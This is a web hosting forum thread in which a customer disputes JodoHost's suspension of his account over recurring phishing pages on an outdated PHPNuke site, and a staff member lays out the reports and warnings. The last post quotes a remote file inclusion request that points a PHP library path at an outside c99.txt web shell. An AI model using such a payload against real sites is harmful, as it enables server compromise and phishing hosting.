This is ridiculous

I've been a customer for over 3 years and never had any problems with JodoHost 'til recently. I have a PHPNuke website and it seems like I downloaded a block that has phishing content in it. I didn't know anything about it since I downloaded the block from PHPNuke official website and never suspected anything could go wrong.

JodoHost renamed the folder that has phishing content and took away my rights to access that folder. When I asked my rights to be reset, they refused to give me rights to that folder but expected me to fix the page that has the phishing content. It's hard to fix something that I can't even access?!?!?!

I updated my version of PHPNuke and found 2 more instances of phishing on my website and safely removed those 2 pages. But I still couldn't fix the original page that has phishing content. When I contacted support and asked them to help me figure out how to fix the problem, they said I need to talk with my webmaster to update the website. I did everything I can to fix the problem, and even updated the whole website to make sure there are no more phishing pages, but my account was suspended yesterday because there is page in my domain that I can't access which has phishing content in it.

I asked support to help me fix the problem, and they said I'm no longer welcome as a client. Now that is ridiculous!

Tommy,

We told you 4 times that you MUST UPGRADE your phpnuke, that using old version is not going to work, we did nto deny you rights to the folder after you said you would take care of it, but the phishing happened 3 mroe times after that!

You left us with no choice as wachovia thinks we are purposefully allowing phishing sites because you are having them on your site over and over and over again.

Stephen,
I upgraded my Nuke website, but was NOT able to fix the one folder because I didn't have access to it (and still can't get that folder to delete the content). I fixed everything else.

I have 2 domains hosted. Why is my other website down?

It's ok to suspend the domain that you say has phishing content (which I fixed), but why is my other domain down?
The other website is a ASP.NET that I coded myself and I know there is no phishing in the other domain.

I'll move my PHPNuke website to another provider. You can even delete it from your server after I backup my data.

Can I at least get my ASP.NET back? And can I get to my control panel to backup my PHPNuke website?

Tommy,

We gave you permissions to it, and right now you of course can't get to the folder, the site is suspended.

We sent you many notices via mail, ticket, and other means, 4 times in 4 different places there were phishing sites added, in other folders in other places.

I understand that you are unhappy, but you MUST act and act FAST when there are phishing sites in questions, we can get in serious trouble with the law when sites keep re-appearing with phishing content in different places.

The block you downloaded did not have phishing, the phpnuke as a whole was being used to put the phishing files up, that is why we said over and over you must upgrade phpnuke, not just portions of it.

Phishing is a serious matter, first reports to us were at 11:06AM on the 25th, we had denied permissions by 11:35AM, we sent a mail to you within 10 minutes of this time, then 4/26 at 10:58AM a new report, we this time stopped your site, added some deny permisisosn and restarted so that it would not display any phishing content, you sumitted a ticket around this time about the deny permissions asking to be removed, they were, you were told you needed to upgrade ASAP in the ticket(and in the emails sent each time). Then 4/27 11:58AM Wachovia again reports phishing on your site, this time we stopped the whole of the domain, I personally replied to you when I stated it and said you have no more chances, if it happens again your account will be suspended. I went against my first thought and allowed you to have access to the domain again. 4/29 8:32PM we got the last reports that we will get on your domain, we can nto have this happening again and again, you were given ample time and warnings before we had to go the drastic route of suspending your account.

You will have the same issue anywhere with your PHPnuke if you dont have the LATEST version, it's not us that is the issue here, this can and will happen anywhere. As for the other domain you will need to submit a ticket and explain that you will remove the PHPNuke site from your account, a tech will alert me when you have this ticket in, and then we will unsuspend the account and you must remove the phpnuke immediate(it could have been averted by taking steps between the 25th and now, but at this point we can not risk you having phishing sites any more)

I downloaded my website from PHPNuke official website. I don't understand how there could be phishing embeded inside the website?!?!?!

I will delete my PHPNuke website as soon as I can get back to control panel and backup my database.

I need access to my other domain and control panel. I submitted a ticket.

Thank you.

It's not so much that it has phishing stuff embedded, but it has known exploits that these people use to place their content on your website.
Updating to the latest version supposedly fixes these security holes, etc.

Whie you are at it take a look at this and see what its vulnerability is:
POST /html/SQuery/lib/igi2.php libpath=http://PARTIALLYREMOVED-team.com/m4d/c99.txt?

Back